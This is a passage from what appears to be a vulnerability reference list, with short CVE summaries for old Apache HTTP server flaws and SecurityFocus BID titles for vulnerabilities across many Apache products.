15394| [CVE-1999-1412] A possible interaction between Apple MacOS X release 1.0 and Apache HTTP server allows remote attackers to cause a denial of service (crash) via a flood of HTTP GET requests to CGI programs, which generates a large number of processes.
15395| [CVE-1999-1293] mod_proxy in Apache 1.2.5 and earlier allows remote attackers to cause a denial of service via malformed FTP commands, which causes Apache to dump core.
15396| [CVE-1999-1237] Multiple buffer overflows in smbvalid/smbval SMB authentication library, as used in Apache::AuthenSmb and possibly other modules, allows remote attackers to execute arbitrary commands via (1) a long username, (2) a long password, and (3) other unspecified methods.
15397| [CVE-1999-1199] Apache WWW server 1.3.1 and earlier allows remote attackers to cause a denial of service (resource exhaustion) via a large number of MIME headers with the same name, aka the "sioux" vulnerability.
15398| [CVE-1999-1053] guestbook.pl cleanses user-inserted SSI commands by removing text between "<!--" and "-->" separators, which allows remote attackers to execute arbitrary commands when guestbook.pl is run on Apache 1.3.9 and possibly other versions, since Apache allows other closing sequences besides "-->".
15399| [CVE-1999-0926] Apache allows remote attackers to conduct a denial of service via a large number of MIME headers.
15400| [CVE-1999-0678] A default configuration of Apache on Debian GNU/Linux sets the ServerRoot to /usr/doc, which allows remote users to read documentation files for the entire server.
15401| [CVE-1999-0448] IIS 4.0 and Apache log HTTP request methods, regardless of how long they are, allowing a remote attacker to hide the URL they really request.
15402| [CVE-1999-0289] The Apache web server for Win32 may provide access to restricted files when a . (dot) is appended to a requested URL.
15403| [CVE-1999-0236] ScriptAlias directory in NCSA and Apache httpd allowed attackers to read CGI programs.
15404| [CVE-1999-0107] Buffer overflow in Apache 1.2.5 and earlier allows a remote attacker to cause a denial of service with a large number of GET requests containing a large number of / characters.
15405| [CVE-1999-0071] Apache httpd cookie buffer overflow for versions 1.1.1 and earlier.
15406|
15407| SecurityFocus - https://www.securityfocus.com/bid/:
15408| [104554] Apache HBase CVE-2018-8025 Security Bypass Vulnerability
15409| [104465] Apache Geode CVE-2017-15695 Remote Code Execution Vulnerability
15410| [104418] Apache Storm CVE-2018-8008 Arbitrary File Write Vulnerability
15411| [104399] Apache Storm CVE-2018-1332 User Impersonation Vulnerability
15412| [104348] Apache UIMA CVE-2017-15691 XML External Entity Injection Vulnerability
15413| [104313] Apache NiFi XML External Entity Injection and Denial of Service Vulnerability
15414| [104259] Apache Geode CVE-2017-12622 Authorization Bypass Vulnerability
15415| [104257] Apache Sling XSS Protection API CVE-2017-15717 Cross Site Scripting Vulnerability
15416| [104253] Apache ZooKeeper CVE-2018-8012 Security Bypass Vulnerability
15417| [104252] Apache Batik CVE-2018-8013 Information Disclosure Vulnerability
15418| [104239] Apache Solr CVE-2018-8010 XML External Entity Multiple Information Disclosure Vulnerabilities
15419| [104215] Apache ORC CVE-2018-8015 Denial of Service Vulnerability
15420| [104203] Apache Tomcat CVE-2018-8014 Security Bypass Vulnerability
15421| [104161] Apache Ambari CVE-2018-8003 Directory Traversal Vulnerability
15422| [104140] Apache Derby CVE-2018-1313 Security Bypass Vulnerability
15423| [104135] Apache Tika CVE-2018-1338 Denial of Service Vulnerability
15424| [104008] Apache Fineract CVE-2018-1291 SQL Injection Vulnerability
15425| [104007] Apache Fineract CVE-2018-1292 SQL Injection Vulnerability
15426| [104005] Apache Fineract CVE-2018-1289 SQL Injection Vulnerability
15427| [104001] Apache Tika CVE-2018-1335 Remote Command Injection Vulnerability
15428| [103975] Apache Fineract CVE-2018-1290 SQL Injection Vulnerability
15429| [103974] Apache Solr CVE-2018-1308 XML External Entity Injection Vulnerability
15430| [103772] Apache Traffic Server CVE-2017-7671 Denial of Service Vulnerability
15431| [103770] Apache Traffic Server CVE-2017-5660 Security Bypass Vulnerability
15432| [103751] Apache Hive CVE-2018-1282 SQL Injection Vulnerability
15433| [103750] Apache Hive CVE-2018-1284 Security Bypass Vulnerability
15434| [103692] Apache Ignite CVE-2018-1295 Arbitrary Code Execution Vulnerability
15435| [103528] Apache HTTP Server CVE-2018-1302 Denial of Service Vulnerability
15436| [103525] Apache HTTP Server CVE-2017-15715 Remote Security Bypass Vulnerability
15437| [103524] Apache HTTP Server CVE-2018-1312 Remote Security Bypass Vulnerability
15438| [103522] Apache HTTP Server CVE-2018-1303 Denial of Service Vulnerability
15439| [103520] Apache HTTP Server CVE-2018-1283 Remote Security Vulnerability
15440| [103516] Apache Struts CVE-2018-1327 Denial of Service Vulnerability
15441| [103515] Apache HTTP Server CVE-2018-1301 Denial of Service Vulnerability
15442| [103512] Apache HTTP Server CVE-2017-15710 Denial of Service Vulnerability
15443| [103508] Apache Syncope CVE-2018-1321 Multiple Remote Code Execution Vulnerabilities
15444| [103507] Apache Syncope CVE-2018-1322 Multiple Information Disclosure Vulnerabilities
15445| [103490] Apache Commons Compress CVE-2018-1324 Multiple Denial Of Service Vulnerabilities
15446| [103434] APACHE Allura CVE-2018-1319 HTTP Response Splitting Vulnerability
15447| [103389] Apache Tomcat JK Connector CVE-2018-1323 Directory Traversal Vulnerability
15448| [103222] Apache CloudStack CVE-2013-4317 Information Disclosure Vulnerability
15449| [103219] Apache Xerces-C CVE-2017-12627 Null Pointer Dereference Denial of Service Vulnerability
15450| [103206] Apache Geode CVE-2017-15693 Remote Code Execution Vulnerability
15451| [103205] Apache Geode CVE-2017-15692 Remote Code Execution Vulnerability
15452| [103170] Apache Tomcat CVE-2018-1304 Security Bypass Vulnerability
15453| [103144] Apache Tomcat CVE-2018-1305 Security Bypass Vulnerability
15454| [103102] Apache Oozie CVE-2017-15712 Information Disclosure Vulnerability
15455| [103098] Apache Karaf CVE-2016-8750 LDAP Injection Vulnerability
15456| [103069] Apache Tomcat CVE-2017-15706 Remote Security Weakness
15457| [103068] Apache JMeter CVE-2018-1287 Security Bypass Vulnerability
15458| [103067] Apache Qpid Dispatch Router 'router_core/connections.c' Denial of Service Vulnerability
15459| [103036] Apache CouchDB CVE-2017-12636 Remote Code Execution Vulnerability
15460| [103025] Apache Thrift CVE-2016-5397 Remote Command Injection Vulnerability
15461| [102879] Apache POI CVE-2017-12626 Multiple Denial of Service Vulnerabilities
15462| [102842] Apache NiFi CVE-2017-12632 Host Header Injection Vulnerability
15463| [102815] Apache NiFi CVE-2017-15697 Multiple Cross Site Scripting Vulnerabilities
15464| [102488] Apache Geode CVE-2017-9795 Remote Code Execution Vulnerability
15465| [102229] Apache Sling CVE-2017-15700 Information Disclosure Vulnerability
15466| [102226] Apache Drill CVE-2017-12630 Cross Site Scripting Vulnerability
15467| [102154] Multiple Apache Products CVE-2017-15708 Remote Code Execution Vulnerability
15468| [102127] Apache CXF Fediz CVE-2017-12631 Multiple Cross Site Request Forgery Vulnerabilities
15469| [102041] Apache Qpid Broker-J CVE-2017-15701 Denial of Service Vulnerability
15470| [102040] Apache Qpid Broker CVE-2017-15702 Security Weakness
15471| [102021] Apache Struts CVE-2017-15707 Denial of Service Vulnerability
15472| [101980] EMC RSA Authentication Agent for Web: Apache Web Server Authentication Bypass Vulnerability
15473| [101876] Apache Camel CVE-2017-12634 Deserialization Remote Code Execution Vulnerability
15474| [101874] Apache Camel CVE-2017-12633 Deserialization Remote Code Execution Vulnerability
15475| [101872] Apache Karaf CVE-2014-0219 Local Denial of Service Vulnerability
15476| [101868] Apache CouchDB CVE-2017-12635 Remote Privilege Escalation Vulnerability
15477| [101859] Apache CXF CVE-2017-12624 Denial of Service Vulnerability
15478| [101844] Apache Sling Servlets Post CVE-2017-11296 Cross Site Scripting Vulnerability
15479| [101686] Apache Hive CVE-2017-12625 Information Disclosure Vulnerability
15480| [101644] Apache Wicket CVE-2012-5636 Cross Site Scripting Vulnerability
15481| [101631] Apache Traffic Server CVE-2015-3249 Multiple Remote Code Execution Vulnerabilities
15482| [101630] Apache Traffic Server CVE-2014-3624 Access Bypass Vulnerability
15483| [101625] Apache jUDDI CVE-2009-1197 Security Bypass Vulnerability
15484| [101623] Apache jUDDI CVE-2009-1198 Cross Site Scripting Vulnerability
15485| [101620] Apache Subversion 'libsvn_fs_fs/fs_fs.c' Denial of Service Vulnerability
15486| [101585] Apache OpenOffice Multiple Remote Code Execution Vulnerabilities
15487| [101577] Apache Wicket CVE-2016-6806 Cross Site Request Forgery Vulnerability
15488| [101575] Apache Wicket CVE-2014-0043 Information Disclosure Vulnerability
15489| [101570] Apache Geode CVE-2017-9797 Information Disclosure Vulnerability
15490| [101562] Apache Derby CVE-2010-2232 Arbitrary File Overwrite Vulnerability
15491| [101560] Apache Portable Runtime Utility CVE-2017-12613 Multiple Information Disclosure Vulnerabilities
15492| [101558] Apache Portable Runtime Utility Local Out-of-Bounds Read Denial of Service Vulnerability
15493| [101532] Apache James CVE-2017-12628 Arbitrary Command Execution Vulnerability
15494| [101516] Apache HTTP Server CVE-2017-12171 Security Bypass Vulnerability
15495| [101261] Apache Solr/Lucene CVE-2017-12629 Information Disclosure and Remote Code Execution Vulnerabilities
15496| [101230] Apache Roller CVE-2014-0030 XML External Entity Injection Vulnerability
15497| [101173] Apache IMPALA CVE-2017-9792 Information Disclosure Vulnerability
15498| [101052] Apache Commons Jelly CVE-2017-12621 Security Bypass Vulnerability
15499| [101027] Apache Mesos CVE-2017-7687 Denial of Service Vulnerability
15500| [101023] Apache Mesos CVE-2017-9790 Denial of Service Vulnerability
15501| [100954] Apache Tomcat CVE-2017-12617 Incomplete Fix Remote Code Execution Vulnerability
15502| [100946] Apache Wicket CVE-2014-7808 Cross Site Request Forgery Vulnerability
15503| [100901] Apache Tomcat CVE-2017-12615 Remote Code Execution Vulnerability
15504| [100897] Apache Tomcat CVE-2017-12616 Information Disclosure Vulnerability
15505| [100880] Apache Directory LDAP API CVE-2015-3250 Unspecified Information Disclosure Vulnerability
15506| [100872] Apache HTTP Server CVE-2017-9798 Information Disclosure Vulnerability
15507| [100870] Apache Solr CVE-2017-9803 Remote Privilege Escalation Vulnerability
15508| [100859] puppetlabs-apache CVE-2017-2299 Information Disclosure Vulnerability
15509| [100829] Apache Struts CVE-2017-12611 Remote Code Execution Vulnerability
15510| [100823] Apache Spark CVE-2017-12612 Deserialization Remote Code Execution Vulnerability
15511| [100612] Apache Struts CVE-2017-9804 Incomplete Fix Denial of Service Vulnerability
15512| [100611] Apache Struts CVE-2017-9793 Denial of Service Vulnerability
15513| [100609] Apache Struts CVE-2017-9805 Remote Code Execution Vulnerability
15514| [100587] Apache Atlas CVE-2017-3155 Cross Frame Scripting Vulnerability
15515| [100581] Apache Atlas CVE-2017-3154 Information Disclosure Vulnerability
15516| [100578] Apache Atlas CVE-2017-3153 Cross Site Scripting Vulnerability
15517| [100577] Apache Atlas CVE-2017-3152 Cross Site Scripting Vulnerability
15518| [100547] Apache Atlas CVE-2017-3151 HTML Injection Vulnerability
15519| [100536] Apache Atlas CVE-2017-3150 Cross Site Scripting Vulnerability
15520| [100449] Apache Pony Mail CVE-2016-4460 Authentication Bypass Vulnerability
15521| [100447] Apache2Triad Multiple Security Vulnerabilities
15522| [100284] Apache Sling Servlets Post CVE-2017-9802 Cross Site Scripting Vulnerability
15523| [100280] Apache Tomcat CVE-2017-7674 Security Bypass Vulnerability
15524| [100259] Apache Subversion CVE-2017-9800 Remote Command Execution Vulnerability
15525| [100256] Apache Tomcat CVE-2017-7675 Directory Traversal Vulnerability
15526| [100235] Apache Storm CVE-2017-9799 Remote Code Execution Vulnerability
15527| [100082] Apache Commons Email CVE-2017-9801 SMTP Header Injection Vulnerability
15528| [99873] Apache Sling XSS Protection API CVE-2016-6798 XML External Entity Injection Vulnerability
15529| [99870] Apache Sling API CVE-2016-5394 Cross Site Scripting Vulnerability
15530| [99603] Apache Spark CVE-2017-7678 Cross Site Scripting Vulnerability
15531| [99592] Apache OpenMeetings CVE-2017-7685 Security Bypass Vulnerability
15532| [99587] Apache OpenMeetings CVE-2017-7673 Security Bypass Vulnerability
15533| [99586] Apache OpenMeetings CVE-2017-7688 Security Bypass Vulnerability
15534| [99584] Apache OpenMeetings CVE-2017-7684 Denial of Service Vulnerability
15535| [99577] Apache OpenMeetings CVE-2017-7663 Cross Site Scripting Vulnerability
15536| [99576] Apache OpenMeetings CVE-2017-7664 XML External Entity Injection Vulnerability
15537| [99569] Apache HTTP Server CVE-2017-9788 Memory Corruption Vulnerability
15538| [99568] Apache HTTP Server CVE-2017-9789 Denial of Service Vulnerability
15539| [99563] Apache Struts CVE-2017-7672 Denial of Service Vulnerability
15540| [99562] Apache Struts Spring AOP Functionality Denial of Service Vulnerability
15541| [99509] Apache Impala CVE-2017-5652 Information Disclosure Vulnerability
15542| [99508] Apache IMPALA CVE-2017-5640 Authentication Bypass Vulnerability
15543| [99486] Apache Traffic Control CVE-2017-7670 Denial of Service Vulnerability
15544| [99485] Apache Solr CVE-2017-7660 Security Bypass Vulnerability
15545| [99484] Apache Struts CVE-2017-9791 Remote Code Execution Vulnerability
15546| [99292] Apache Ignite CVE-2017-7686 Information Disclosure Vulnerability
15547| [99170] Apache HTTP Server CVE-2017-7679 Buffer Overflow Vulnerability
15548| [99137] Apache HTTP Server CVE-2017-7668 Denial of Service Vulnerability
15549| [99135] Apache HTTP Server CVE-2017-3167 Authentication Bypass Vulnerability
15550| [99134] Apache HTTP Server CVE-2017-3169 Denial of Service Vulnerability
15551| [99132] Apache HTTP Server CVE-2017-7659 Denial of Service Vulnerability
15552| [99112] Apache Thrift CVE-2015-3254 Denial of Service Vulnerability
15553| [99067] Apache Ranger CVE-2016-8751 HTML Injection Vulnerability
15554| [99018] Apache NiFi CVE-2017-7667 Cross Frame Scripting Vulnerability
15555| [99009] Apache NiFi CVE-2017-7665 Cross Site Scripting Vulnerability
15556| [98961] Apache Ranger CVE-2017-7677 Security Bypass Vulnerability
15557| [98958] Apache Ranger CVE-2017-7676 Security Bypass Vulnerability
15558| [98888] Apache Tomcat CVE-2017-5664 Security Bypass Vulnerability
15559| [98814] Apache Zookeeper CVE-2017-5637 Denial of Service Vulnerability
15560| [98795] Apache Hadoop CVE-2017-7669 Remote Privilege Escalation Vulnerability
15561| [98739] Apache Knox CVE-2017-5646 User Impersonation Vulnerability
15562| [98669] Apache Hive CVE-2016-3083 Security Bypass Vulnerability
15563| [98646] Apache Atlas CVE-2016-8752 Information Disclosure Vulnerability
15564| [98570] Apache Archiva CVE-2017-5657 Multiple Cross-Site Request Forgery Vulnerabilities
15565| [98489] Apache CXF Fediz CVE-2017-7661 Multiple Cross Site Request Forgery Vulnerabilities
15566| [98485] Apache CXF Fediz CVE-2017-7662 Cross Site Request Forgery Vulnerability
15567| [98466] Apache Ambari CVE-2017-5655 Insecure Temporary File Handling Vulnerability
15568| [98365] Apache Cordova For Android CVE-2016-6799 Information Disclosure Vulnerability
15569| [98025] Apache Hadoop CVE-2017-3161 Cross Site Scripting Vulnerability
15570| [98017] Apache Hadoop CVE-2017-3162 Input Validation Vulnerability
15571| [97971] Apache CXF CVE-2017-5656 Information Disclosure Vulnerability
15572| [97968] Apache CXF CVE-2017-5653 Spoofing Vulnerability
15573| [97967] Apache ActiveMQ CVE-2015-7559 Denial of Service Vulnerability
15574| [97949] Apache Traffic Server CVE-2017-5659 Denial of Service Vulnerability
15575| [97948] Apache Batik CVE-2017-5662 XML External Entity Information Disclosure Vulnerability
15576| [97947] Apache FOP CVE-2017-5661 XML External Entity Information Disclosure Vulnerability
15577| [97945] Apache Traffic Server CVE-2016-5396 Denial of Service Vulnerability
15578| [97702] Apache Log4j CVE-2017-5645 Remote Code Execution Vulnerability
15579| [97582] Apache CXF CVE-2016-6812 Cross Site Scripting Vulnerability
15580| [97579] Apache CXF JAX-RS CVE-2016-8739 XML External Entity Injection Vulnerability
15581| [97544] Apache Tomcat CVE-2017-5651 Information Disclosure Vulnerability
15582| [97531] Apache Tomcat CVE-2017-5650 Denial of Service Vulnerability
15583| [97530] Apache Tomcat CVE-2017-5648 Information Disclosure Vulnerability
15584| [97509] Apache Ignite CVE-2016-6805 Information Disclosure and XML External Entity Injection Vulnerabilities
15585| [97383] Apache Flex BlazeDS CVE-2017-5641 Remote Code Execution Vulnerability
15586| [97378] Apache Geode CVE-2017-5649 Information Disclosure Vulnerability
15587| [97229] Apache Ambari CVE-2016-4976 Local Information Disclosure Vulnerability
15588| [97226] Apache Camel CVE-2017-5643 Server Side Request Forgery Security Bypass Vulnerability
15589| [97184] Apache Ambari CVE-2016-6807 Remote Command Execution Vulnerability
15590| [97179] Apache Camel CVE-2016-8749 Java Deserialization Multiple Remote Code Execution Vulnerabilities
15591| [96983] Apache POI CVE-2017-5644 Denial Of Service Vulnerability
15592| [96895] Apache Tomcat CVE-2016-8747 Information Disclosure Vulnerability
15593| [96731] Apache NiFi CVE-2017-5636 Remote Code Injection Vulnerability
15594| [96730] Apache NiFi CVE-2017-5635 Security Bypass Vulnerability
15595| [96729] Apache Struts CVE-2017-5638 Remote Code Execution Vulnerability
15596| [96540] IBM Development Package for Apache Spark CVE-2016-4970 Denial of Service Vulnerability
15597| [96398] Apache CXF CVE-2017-3156 Information Disclosure Vulnerability
15598| [96321] Apache Camel CVE-2017-3159 Remote Code Execution Vulnerability
15599| [96293] Apache Tomcat 'http11/AbstractInputBuffer.java' Denial of Service Vulnerability
15600| [96228] Apache Brooklyn Cross Site Request Forgery and Multiple Cross Site Scripting Vulnerabilities
15601| [95998] Apache Ranger CVE-2016-8746 Security Bypass Vulnerability
15602| [95929] Apache Groovy CVE-2016-6497 Information Disclosure Vulnerability
15603| [95838] Apache Cordova For Android CVE-2017-3160 Man in the Middle Security Bypass Vulnerability
15604| [95675] Apache Struts Remote Code Execution Vulnerability
15605| [95621] Apache NiFi CVE-2106-8748 Cross Site Scripting Vulnerability
15606| [95429] Apache Groovy CVE-2016-6814 Remote Code Execution Vulnerability
15607| [95335] Apache Hadoop CVE-2016-3086 Information Disclosure Vulnerability
15608| [95168] Apache Wicket CVE-2016-6793 Denial of Service Vulnerability
15609| [95136] Apache Qpid Broker for Java CVE-2016-8741 Remote Information Disclosure Vulnerability
15610| [95078] Apache HTTP Server CVE-2016-0736 Remote Security Vulnerability
15611| [95077] Apache HTTP Server CVE-2016-8743 Security Bypass Vulnerability
15612| [95076] Apache HTTP Server CVE-2016-2161 Denial of Service Vulnerability
15613| [95020] Apache Tika CVE-2015-3271 Remote Information Disclosure Vulnerability
15614| [94950] Apache Hadoop CVE-2016-5001 Local Information Disclosure Vulnerability
15615| [94882] Apache ActiveMQ CVE-2016-6810 HTML Injection Vulnerability
15616| [94828] Apache Tomcat CVE-2016-8745 Information Disclosure Vulnerability
15617| [94766] Apache CouchDB CVE-2016-8742 Local Privilege Escalation Vulnerability
15618| [94657] Apache Struts CVE-2016-8738 Denial of Service Vulnerability
15619| [94650] Apache HTTP Server CVE-2016-8740 Denial of Service Vulnerability
15620| [94588] Apache Subversion CVE-2016-8734 XML External Entity Denial of Service Vulnerability
15621| [94513] Apache Karaf CVE-2016-8648 Remote Code Execution Vulnerability
15622| [94463] Apache Tomcat CVE-2016-8735 Remote Code Execution Vulnerability
15623| [94462] Apache Tomcat CVE-2016-6817 Denial of Service Vulnerability
15624| [94461] Apache Tomcat CVE-2016-6816 Security Bypass Vulnerability
15625| [94418] Apache OpenOffice CVE-2016-6803 Local Privilege Escalation Vulnerability
15626| [94247] Apache Tika CVE-2016-6809 Remote Code Execution Vulnerability
15627| [94221] Apache Ranger CVE-2016-6815 Local Privilege Escalation Vulnerability
15628| [94145] Apache OpenMeetings CVE-2016-8736 Remote Code Execution Vulnerability
15629| [93945] Apache CloudStack CVE-2016-6813 Authorization Bypass Vulnerability
15630| [93944] Apache Tomcat Security Manager CVE-2016-6796 Security Bypass Vulnerability
15631| [93943] Apache Tomcat CVE-2016-6794 Security Bypass Vulnerability
15632| [93942] Apache Tomcat Security Manager CVE-2016-5018 Security Bypass Vulnerability
15633| [93940] Apache Tomcat CVE-2016-6797 Security Bypass Vulnerability
15634| [93939] Apache Tomcat CVE-2016-0762 Information Disclosure Vulnerability
15635| [93774] Apache OpenOffice CVE-2016-6804 DLL Loading Remote Code Execution Vulnerability
15636| [93773] Apache Struts CVE-2016-6795 Directory Traversal Vulnerability
15637| [93478] Apache Tomcat CVE-2016-6325 Local Privilege Escalation Vulnerability
15638| [93472] Apache Tomcat CVE-2016-5425 Insecure File Permissions Vulnerability
15639| [93429] Apache Tomcat JK Connector CVE-2016-6808 Remote Buffer Overflow Vulnerability
15640| [93263] Apache Tomcat CVE-2016-1240 Local Privilege Escalation Vulnerability
15641| [93236] Apache MyFaces Trinidad CVE-2016-5019 Remote Code Execution Vulnerability
15642| [93142] Apache ActiveMQ Artemis CVE-2016-4978 Remote Code Execution Vulnerability
15643| [93132] Apache Derby CVE-2015-1832 XML External Entity Information Disclosure Vulnerability
15644| [93044] Apache Zookeeper CVE-2016-5017 Buffer Overflow Vulnerability
15645| [92966] Apache Jackrabbit CVE-2016-6801 Cross-Site Request Forgery Vulnerability
15646| [92947] Apache Shiro CVE-2016-6802 Remote Security Bypass Vulnerability
15647| [92905] Apache CXF Fediz CVE-2016-4464 Security Bypass Vulnerability
15648| [92577] Apache Ranger CVE-2016-5395 HTML Injection Vulnerability
15649| [92331] Apache HTTP Server CVE-2016-1546 Remote Denial of Service Vulnerability
15650| [92328] Apache Hive CVE-2016-0760 Multiple Remote Code Execution Vulnerabilities
15651| [92320] Apache APR-util and httpd CVE-2016-6312 Denial of Service Vulnerability
15652| [92100] Apache POI CVE-2016-5000 XML External Entity Injection Vulnerability
15653| [92079] Apache OpenOffice CVE-2016-1513 Remote Code Execution Vulnerability
15654| [91818] Apache Tomcat CVE-2016-5388 Security Bypass Vulnerability
15655| [91816] Apache HTTP Server CVE-2016-5387 Security Bypass Vulnerability
15656| [91788] Apache Qpid Proton CVE-2016-4467 Certificate Verification Security Bypass Vulnerability
15657| [91738] Apache XML-RPC CVE-2016-5003 Remote Code Execution Vulnerability
15658| [91736] Apache XML-RPC Multiple Security Vulnerabilities
15659| [91707] Apache Archiva CVE-2016-5005 HTML Injection Vulnerability
15660| [91703] Apache Archiva CVE-2016-4469 Multiple Cross-Site Request Forgery Vulnerabilities
15661| [91566] Apache HTTP Server CVE-2016-4979 Authentication Bypass Vulnerability
15662| [91537] Apache QPID CVE-2016-4974 Deserialization Security Bypass Vulnerability
15663| [91501] Apache Xerces-C CVE-2016-4463 Stack Buffer Overflow Vulnerability
15664| [91453] Apache Commons FileUpload CVE-2016-3092 Denial Of Service Vulnerability
15665| [91284] Apache Struts CVE-2016-4431 Security Bypass Vulnerability
15666| [91282] Apache Struts CVE-2016-4433 Security Bypass Vulnerability
15667| [91281] Apache Struts CVE-2016-4430 Cross-Site Request Forgery Vulnerability
15668| [91280] Apache Struts CVE-2016-4436 Security Bypass Vulnerability
15669| [91278] Apache Struts CVE-2016-4465 Denial of Service Vulnerability
15670| [91277] Apache Struts Incomplete Fix Remote Code Execution Vulnerability
15671| [91275] Apache Struts CVE-2016-4438 Remote Code Execution Vulnerability
15672| [91217] Apache Continuum 'saveInstallation.action' Command Execution Vulnerability
15673| [91141] Apache CloudStack CVE-2016-3085 Authentication Bypass Vulnerability
15674| [91068] Apache Struts CVE-2016-1181 Remote Code Execution Vulnerability
15675| [91067] Apache Struts CVE-2016-1182 Security Bypass Vulnerability
15676| [91024] Apache Shiro CVE-2016-4437 Information Disclosure Vulnerability
15677| [90988] Apache Ranger CVE-2016-2174 SQL Injection Vulnerability
15678| [90961] Apache Struts CVE-2016-3093 Denial of Service Vulnerability
15679| [90960] Apache Struts CVE-2016-3087 Remote Code Execution Vulnerability
15680| [90921] Apache Qpid CVE-2016-4432 Authentication Bypass Vulnerability
15681| [90920] Apache Qpid CVE-2016-3094 Denial of Service Vulnerability
15682| [90902] Apache PDFBox CVE-2016-2175 XML External Entity Injection Vulnerability
15683| [90897] Apache Tika CVE-2016-4434 XML External Entity Injection Vulnerability
15684| [90827] Apache ActiveMQ CVE-2016-3088 Multiple Arbitrary File Upload Vulnerabilities
15685| [90755] Apache Ambari CVE-2016-0707 Multiple Local Information Disclosure Vulnerabilities
15686| [90482] Apache CVE-2004-1387 Local Security Vulnerability
15687| [89762] Apache CVE-2001-1556 Remote Security Vulnerability
15688| [89417] Apache Subversion CVE-2016-2167 Authentication Bypass Vulnerability
15689| [89326] RETIRED: Apache Subversion CVE-2016-2167 Security Bypass Vulnerability
15690| [89320] Apache Subversion CVE-2016-2168 Remote Denial of Service Vulnerability
15691| [88826] Apache Struts CVE-2016-3082 Remote Code Execution Vulnerability
15692| [88797] Apache Cordova For iOS CVE-2015-5208 Arbitrary Code Execution Vulnerability
15693| [88764] Apache Cordova iOS CVE-2015-5207 Multiple Security Bypass Vulnerabilities
15694| [88701] Apache CVE-2001-1449 Remote Security Vulnerability
15695| [88635] Apache CVE-2000-1204 Remote Security Vulnerability
15696| [88590] Apache WWW server CVE-1999-1199 Denial-Of-Service Vulnerability
15697| [88496] Apache CVE-2000-1206 Remote Security Vulnerability
15698| [87828] Apache CVE-1999-1237 Remote Security Vulnerability
15699| [87784] Apache CVE-1999-1293 Denial-Of-Service Vulnerability
15700| [87327] Apache Struts CVE-2016-3081 Remote Code Execution Vulnerability
15701| [86622] Apache Stats CVE-2007-0975 Remote Security Vulnerability
15702| [86399] Apache CVE-2007-1743 Local Security Vulnerability
15703| [86397] Apache CVE-2007-1742 Local Security Vulnerability
15704| [86311] Apache Struts CVE-2016-4003 Cross Site Scripting Vulnerability
15705| [86174] Apache Wicket CVE-2015-5347 Cross Site Scripting Vulnerability
15706| [85971] Apache OFBiz CVE-2016-2170 Java Deserialization Remote Code Execution Vulnerability
15707| [85967] Apache OFBiz CVE-2015-3268 HTML Injection Vulnerability
15708| [85759] Apache Jetspeed CVE-2016-2171 Unauthorized Access Vulnerability
15709| [85758] Apache Jetspeed CVE-2016-0712 Cross Site Scripting Vulnerability
15710| [85756] Apache Jetspeed CVE-2016-0710 Multiple SQL Injection Vulnerabilities
15711| [85755] Apache Jetspeed CVE-2016-0711 Mulitple HTML Injection Vulnerabilities
15712| [85754] Apache Jetspeed CVE-2016-0709 Directory Traversal Vulnerability
15713| [85730] Apache Subversion CVE-2015-5343 Integer Overflow Vulnerability
15714| [85691] Apache Ranger CVE-2016-0735 Security Bypass Vulnerability
15715| [85578] Apache ActiveMQ CVE-2010-1244 Cross-Site Request Forgery Vulnerability
15716| [85554] Apache OpenMeetings CVE-2016-2164 Multiple Information Disclosure Vulnerabilities
15717| [85553] Apache OpenMeetings CVE-2016-0783 Information Disclosure Vulnerability
15718| [85552] Apache OpenMeetings CVE-2016-2163 HTML Injection Vulnerability
15719| [85550] Apache OpenMeetings CVE-2016-0784 Directory Traversal Vulnerability
15720| [85386] Apache Hadoop CVE-2015-7430 Local Privilege Escalation Vulnerability
15721| [85377] Apache Qpid Proton Python API CVE-2016-2166 Man in the Middle Security Bypass Vulnerability
15722| [85205] Apache Solr CVE-2015-8796 Cross Site Scripting Vulnerability
15723| [85203] Apache Solr CVE-2015-8795 Mulitple HTML Injection Vulnerabilities
15724| [85163] Apache Geronimo CVE-2008-0732 Local Security Vulnerability
15725| [85131] Apache Struts 'TextParseUtil.translateVariables()' Method Remote Code Execution Vulnerability
15726| [85070] Apache Struts CVE-2016-2162 Cross Site Scripting Vulnerability
15727| [85066] Apache Struts CVE-2016-0785 Remote Code Execution Vulnerability
15728| [84422] Apache TomEE CVE-2016-0779 Unspecified Security Vulnerability
15729| [84321] Apache ActiveMQ CVE-2016-0734 Clickjacking Vulnerability
15730| [84316] Apache ActiveMQ CVE-2016-0782 Multiple Cross Site Scripting Vulnerabilities
15731| [83910] Apache Wicket CVE-2015-7520 Cross Site Scripting Vulnerability
15732| [83423] Apache Xerces-C CVE-2016-0729 Buffer Overflow Vulnerability
15733| [83330] Apache Tomcat CVE-2015-5351 Cross Site Request Forgery Vulnerability
15734| [83329] Apache Tomcat CVE-2015-5174 Directory Traversal Vulnerability
15735| [83328] Apache Tomcat CVE-2015-5345 Directory Traversal Vulnerability
15736| [83327] Apache Tomcat Security Manager CVE-2016-0714 Remote Code Execution Vulnerability
15737| [83326] Apache Tomcat CVE-2016-0763 Security Bypass Vulnerability
15738| [83324] Apache Tomcat Security Manager CVE-2016-0706 Information Disclosure Vulnerability
15739| [83323] Apache Tomcat CVE-2015-5346 Session Fixation Vulnerability
15740| [83259] Apache Hadoop CVE-2015-1776 Information Disclosure Vulnerability
15741| [83243] Apache Solr CVE-2015-8797 Cross Site Scripting Vulnerability
15742| [83119] Apache Sling CVE-2016-0956 Information Disclosure Vulnerability
15743| [83002] Apache CVE-2000-1205 Cross-Site Scripting Vulnerability
15744| [82871] Apache Ranger Authentication Bypass and Security Bypass Vulnerabilities
15745| [82800] Apache CloudStack CVE-2015-3251 Information Disclosure Vulnerability
15746| [82798] Apache CloudStack CVE-2015-3252 Authentication Bypass Vulnerability
15747| [82732] Apache Gallery CVE-2003-0771 Local Security Vulnerability
15748| [82676] Apache CVE-2003-1581 Cross-Site Scripting Vulnerability
15749| [82550] Apache Struts CVE-2015-5209 Security Bypass Vulnerability
15750| [82300] Apache Subversion CVE-2015-5259 Integer Overflow Vulnerability
15751| [82260] Apache Camel CVE-2015-5344 Remote Code Execution Vulnerability
15752| [82234] Apache Hive CVE-2015-7521 Security Bypass Vulnerability
15753| [82082] Apache CVE-1999-0289 Remote Security Vulnerability
15754| [81821] Apache Distribution for Solaris CVE-2007-2080 SQL-Injection Vulnerability
15755| [80696] Apache Camel CVE-2015-5348 Information Disclosure Vulnerability
15756| [80525] Apache CVE-2003-1580 Remote Security Vulnerability
15757| [80354] Drupal Apache Solr Search Module Access Bypass Vulnerability
15758| [80193] Apache CVE-1999-0107 Denial-Of-Service Vulnerability
15759| [79812] Apache Directory Studio CVE-2015-5349 Command Injection Vulnerability
15760| [79744] Apache HBase CVE-2015-1836 Unauthorized Access Vulnerability
